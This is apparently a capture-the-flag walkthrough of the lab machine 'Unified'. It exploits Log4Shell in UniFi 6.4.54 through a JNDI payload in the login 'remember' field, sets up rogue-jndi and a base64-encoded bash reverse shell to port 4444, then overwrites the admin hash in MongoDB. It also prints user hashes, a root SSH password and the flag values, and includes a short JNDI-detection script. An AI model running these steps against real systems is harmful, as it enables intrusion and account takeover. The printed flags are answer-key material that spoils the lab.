
Unified


Last updated 2 years ago

This writeup explores the effects of exploiting Log4J in a very well known network appliance monitoring system called "UniFi". This box will show you how to set up and install the necessary packages and tools to exploit UniFi by abusing the Log4J vulnerability and manipulating a field called remember in the login POST request, giving you a reverse shell on the machine. You'll also change the administrator's password by altering the hash saved in the MongoDB instance running on the system, which gives access to the administration panel and leads to the disclosure of the administrator's SSH password.

TARGET IP --> 10.129.94.83

Task 1: Which are the first four open ports?

  • Start with an NMAP scan of the target IP.

nmap [Target IP]
  • Looks like 4 typical ports are open from the scan.

  • Ports Open:

    • 22 --> SSH

    • 6789 --> ibm-db2-admin

    • 8080 --> http-proxy

    • 8443 --> https-alt (ssl/nagios-nsca Nagios NSCA)

Task 2: What is the title of the software that is running on port 8443?

  • Run a script scan of port 8443.

nmap -sV -sC -p 8443 [Target IP]
  • The software title can be seen under the "http-title" field: UniFi Network

Task 3: What is the version of the software that is running?

  • Since the version number does not pop up in our nmap scan, let's visit the webpage URL. The key here is that the service is secured through TLS so it will be https not http.

https://[Target IP]:8443
  • Under the UniFi logo it shows a version number of 6.4.54.

Task 4: What is the CVE for the identified vulnerability?

  • Doing a quick google search for vulnerabilities for this software and version led to this page for CVE-2021-44228.

Task 5: What protocol does JNDI leverage in the injection?

  • I opened up burpsuite and turned on foxyproxy to catch packets. I put in test:test for credentials and captured a packet with burpsuite.

  • I had to reload the page as the packets were not originally being caught.

  • I then Right-Clicked on the packet and sent it to the Burpsuite Repeater.

  • Based on the documentation for the vulnerability, I will place the payload in the remember parameter.

  • The payload should be placed in "" to ensure it is referred to as a string. Here is the payload with the HOST IP.

${jndi:ldap://{HOST IP Address}/whatever}
  • You'll notice that the payload uses an interface called JNDI and leverages the LDAP protocol to communicate.

Task 6: What tool do we use to intercept the traffic, indicating the attack was successful?

  • Once I hit enter it kicked back that it was unsuccessful but it was actually successful. I can confirm this by using the tool tcpdump.

Task 7: What port do we need to inspect intercepted traffic for?

  • We point tcpdump at port 389 (LDAP) to intercept the traffic.

  • We can confirm that the server is trying to connect back to the host machine by collecting the traffic it is sending back on Port 389 with LDAP.

  • First start up a new terminal window and use the following:

sudo tcpdump -i tun0 port 389
  • tcpdump is essentially wireshark on a CLI.

  • After you have started the dump from above, click on the Send button in your Burp Suite Repeater and you should receive a response back on tcpdump similar to the following.

  • This tells me that the server is trying to make a connection back over port 389.
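From the defender's side, the same two artefacts (a JNDI lookup in the remember field of the login POST, and the LDAP callback host/port that shows up on port 389 or 1389) are what you would look for in request logs. The following is an added example, not part of the original write-up; the sample request bodies and the 10.10.14.2 address are constructed for illustration.

```python
import json
import re
from typing import Optional

# Match ${jndi:<scheme>://<host>[:port]/...} after obfuscation has been stripped.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns)\s*:\s*//\s*([^/\s}]+)",
    re.IGNORECASE,
)
# ${lower:x} / ${upper:x} wrappers are commonly used to hide the word "jndi".
NESTED_LOOKUP = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^}]*)\}", re.IGNORECASE)


def normalize(value: str) -> str:
    """Repeatedly unwrap ${lower:..}/${upper:..} so nested lookups become plain text."""
    prev = None
    while prev != value:
        prev = value
        value = NESTED_LOOKUP.sub(lambda m: m.group(2), value)
    return value


def inspect_login_body(body: str) -> Optional[dict]:
    """Return field, scheme and callback target if the JSON body carries a JNDI lookup."""
    try:
        fields = json.loads(body)
    except json.JSONDecodeError:
        return None
    for field, raw in fields.items():
        if not isinstance(raw, str):  # a genuine UniFi "remember" is a boolean
            continue
        match = JNDI_LOOKUP.search(normalize(raw))
        if match:
            host, _, port = match.group(2).partition(":")
            # LDAP defaults to 389 when no explicit port is given in the URL.
            return {"field": field, "scheme": match.group(1).lower(),
                    "host": host, "port": int(port) if port.isdigit() else 389}
    return None


# Constructed sample login bodies (not captured from the real target).
SAMPLES = [
    '{"username":"test","password":"test","remember":"${jndi:ldap://10.10.14.2:1389/o=tomcat}","strict":true}',
    '{"username":"test","password":"test","remember":"${${lower:j}ndi:ldap://10.10.14.2/whatever}","strict":true}',
    '{"username":"admin","password":"hunter2","remember":true,"strict":true}',
]


def scan(samples):
    """Run the check over a list of request bodies; None means nothing suspicious."""
    return [inspect_login_body(s) for s in samples]
```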

Task 8: What port is the MongoDB service running on?

  • We will first need to build a Java payload. To do this, I need to first install OpenJDK, which is used to build Java applications.

sudo apt install openjdk-11-jre -y
  • You can confirm that java has been installed by running the following.

java -version
  • Next is to install Maven, which is used to build Java projects.

sudo apt install maven -y
  • To confirm you have installed it we can run the following:

mvn -v
  • After this we need to download and install the Rogue-JNDI Java application.

git clone https://github.com/veracode-research/rogue-jndi
  • Change directory into the downloaded folder.

cd rogue-jndi
  • Next is to use Maven to compile the code from Rogue-JNDI into a distributable format. This will create a .jar file in the target directory.

mvn package
  • The payload we will use is a pretty basic bash reverse shell.

bash -c "bash -i >& /dev/tcp/[HOST IP]/4444 0>&1"
  • We will then need to base64 encode it to avoid any issues when uploading it.

echo bash -c "bash -i >&/dev/tcp/[HOST IP]/4444 0>&1" | base64
  • Base64 Encoded Payload --> YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjA3LzQ0NDQgMD4mMQo=

  • Make sure you have started up a netcat listener on a separate terminal window.

nc -lvnp 4444
  • Now we need to feed the base64 encoded payload into the rogue-jndi application.

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,BASE64 STRING HERE}|{base64,-d}|{bash,-i}" --hostname "[HOST IP ADDRESS]"
  • This will feed the payload into the application using the --command flag.

  • Next is to go back to the intercepted packet in the Burp Suite Repeater and change the remember parameter to the following:

${jndi:ldap://[HOST IP]:1389/o=tomcat}
  • On the rogue JNDI application that is listening on port 1389, you'll notice a new entry that tells us we have received a connection back to our host machine.

  • I should now have a reverse shell connection to the target if I go back to my netcat listener.

  • Now that I have access I can check which processes are currently running to see if I can determine which port mongod is running on.

ps aux
  • It looks like mongod is running as PID 67 and is located in bin/mongod

  • I tried running netstat to see what port it is running on but it looks like the command is not found.

  • Instead I decided to grep mongod out of the previous ps output

ps aux | grep mongod
  • Mongod is running on port 27117

Task 9: What is the default database name for UniFi applications?

  • A quick Google search for the default database name for UniFi applications results in "ace".

Task 10: What is the function we use to enumerate users within the database in MongoDB?

  • On the target machine that you have a reverse shell connection to, run the following to access the mongod database and search for possible credentials within it.

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
  • mongo --> is the command to access a mongod database

  • --port --> specifies the port the process is running on. In this case mongod typically runs on port 27117.

  • ace --> Is the typical default database name for mongod.

  • --eval [SCRIPT] --> Runs the given query to locate possible admin credentials.

  • This gave me a lot of different user credentials, but it appears that all the passwords are stored in the x_shadow field as hashes.

  • administrator@unified.htb

    • $6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.

    • ObjectId --> 61ce278f46e0fb0012d47ee4

  • michael@unified.htb

    • $6$spHwHYVF$mF/VQrMNGSau0IP7LjqQMfF5VjZBph6VUf4clW3SULqBjDNQwW.BlIqsafYbLWmKRhfWTiZLjhSP.D/M1h5yJ0

  • seamus@unified.htb

    • $6$NT.hcX..$aFei35dMy7Ddn.O.UFybjrAaRR5UfzzChhIeCs0lp1mmXhVHol6feKv4hj8LaGe0dTiyvq1tmA.j9.kfDP.xC.

  • warren@unified.htb

    • $6$DDOzp/8g$VXE2i.FgQSRJvTu.8G4jtxhJ8gm22FuCoQbAhhyLFCMcwX95ybr4dCJR/Otas100PZA9fHWgTpWYzth5KcaCZ.

  • james@unified.htb

    • $6$ON/tM.23$cp3j11TkOCDVdy/DzOtpEbRC5mqbi1PPUM6N4ao3Bog8rO.ZGqn6Xysm3v0bKtyclltYmYvbXLhNybGyjvAey1


  • I won't be able to crack any of these hashes but can instead make new passwords to be utilized for the administrator account.

  • I can figure out that the hash is SHA-512 crypt by searching online and also from the $6$ prefix at the beginning.

  • I'll create a new password for the admin account. Open a new terminal window on your host machine and run the following to create a SHA512 hash of the password: Password1234

mkpasswd -m sha-512 Password1234
  • This will output the following hash. mkpasswd picks its own random salt (the segment between the second and third $), which does not need to match the original salt, since we upload the whole hash in place of the current one for the admin account.

$6$5e8PzvB0g7cXSVDQ$BKfQ4vD6u.QkLuGPUiKkiAJAtP0hfDXFIPra60/Ttb1d.YeY/U9qSbwisLFu2dO4RznDm29Wn5.67wy4b5rIV.
  • Next is to run the following on the target machine to replace the administrator's password with the new one we just generated.

mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("[OBJECT ID FOR ADMIN]")},{$set:{"x_shadow":"[SHA512 GENERATED HASH OF PASSWORD]"}})'
  • Here is the command I used:

mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$5e8PzvB0g7cXSVDQ$BKfQ4vD6u.QkLuGPUiKkiAJAtP0hfDXFIPra60/Ttb1d.YeY/U9qSbwisLFu2dO4RznDm29Wn5.67wy4b5rIV."}})'
  • This should have now replaced the administrator's hashed password with ours.

  • We can verify it worked by running the previous command to view the credentials:

mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
  • Now that we have changed the password, we should be able to login to the admin account through the web portal with the password: Password1234

  • Back to the original task: The function we use to enumerate users is:

db.admin.find()
  • We used this further above to view all of the users and their credentials.

Task 11: What is the function we use to update users within the database in MongoDB?

  • We used this in the previous task to update the administrator's password.

db.admin.update()

Task 12: What is the password for the root user?

  • On the UniFi admin page, go to the Settings tab on the left and click on Site.

  • Scroll to the bottom where Device Authentication is.

  • You'll find that SSH is enabled with the following credentials:

  • root:NotACrackablePassword4U2022

Capture User Flag:

  • Now that we have root credentials, let's SSH into the target computer using them.

ssh root@[TARGET IP]
  • cat the user file located in Michael's directory. This can be done without root privileges.

cat /home/michael/user.txt
  • 6ced1a6a89e666c0620cdb10262ba127

Capture Root Flag:

  • cat the root.txt file located in the root directory.

cat /root/root.txt
  • e50bc93c75b634e4b272d2f771c33681
